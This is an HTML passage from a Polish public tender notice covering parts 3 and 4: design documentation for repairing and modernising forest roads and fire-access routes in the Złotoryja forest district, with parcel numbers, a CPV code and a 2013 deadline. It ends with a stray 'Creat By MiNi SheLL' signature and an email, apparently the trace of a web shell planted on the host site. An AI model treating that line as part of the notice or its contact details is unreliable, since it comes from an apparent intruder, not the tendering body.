<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> opracowanie dokumentacji projektowej dla zadania Remont połączony z modernizacją dojazdu pożarowego 47,49, 50, 45 A oraz trzech innych dróg leśnych w Nadleśnictwie Złotoryja, w leśnictwie Olszanica o szacunkowej długości ok. 4 900 m. Należy opracować dokumentacje oddzielnie dla każdego z dojazdów pożarowych i dróg leśnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lokalizacja dojazdu pożarowego 47 Leśnictwo: Olszanica, Oddz. 355, Powiat:  złotoryjski, Gmina : Zagrodno, Obręb ewidencyjny : Uniejowice
Działka nr: 561/355

Lokalizacja drogi leśnej
Leśnictwo: Olszanica, Oddz. 355, 356, 357, Powiat:  złotoryjski, Gmina : Zagrodno
Obręb ewidencyjny : Uniejowice, Działka nr: 563/357, 562/356, 561/355

Lokalizacja dojazdu pożarowego 49 
Leśnictwo: Olszanica, Oddz. 359, 360, 363, Powiat: złotoryjski,Gmina : Zagrodno
Obręb ewidencyjny : Grodziec, działka nr: 685/360, 
Obręb ewidencyjny : Uniejowice, działka nr: 564/359, 566/363

Lokalizacja drogi leśnej 
Leśnictwo: Olszanica Oddz. 365, 366, 367, Powiat: złotoryjski, Gmina : Zagrodno
Obręb ewidencyjny : Uniejowice, działka nr: 568/366

Powiat: złotoryjski, Gmina : Pielgrzymka, Obręb ewidencyjny : Wojcieszyn, działka nr: 777/367, 778/365

Lokalizacja dojazdu pożarowego 45 A 
Leśnictwo: Olszanica Oddz. 391, Powiat: bolesławiecki, Gmina :Warta Bolesławiecka, Obręb ewidencyjny : Jurków, działka nr: 175/391 

Lokalizacja drogi leśnej 
Leśnictwo: Olszanica Oddz. 392, Powiat: bolesławiecki, Gmina :Warta Bolesławiecka
Obręb ewidencyjny : Raciborowice Górne, działka nr: 912/392.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> opracowanie dokumentacji projektowej dla zadania Remont połączony z modernizacją dróg leśnych w Nadleśnictwie Złotoryja, w leśnictwie Okmiany o szacunkowej długości ok. 2 900 m. Należy opracować dokumentacje oddzielnie dla każdej z dróg..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lokalizacja drogi leśnej 
Leśnictwo: Okmiany
Oddz. 311, 313, 314, 315, 317, 318
Powiat: legnicki
Gmina :Chojnów
Obręb ewidencyjny : Okmiany, działka nr: 540/318, 507/317, 515/313, 513/314, 505/315

Powiat: bolesławiecki
Gmina :Warta Bolesławiecka
Obręb ewidencyjny : Lubków, działka nr: 457/311
Lokalizacja drogi leśnej 
Leśnictwo: Okmiany
Oddz. 325, 332
Powiat: legnicki
Gmina : Chojnów
Obręb ewidencyjny : Okmiany, działka nr: 550/332, 500/325.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com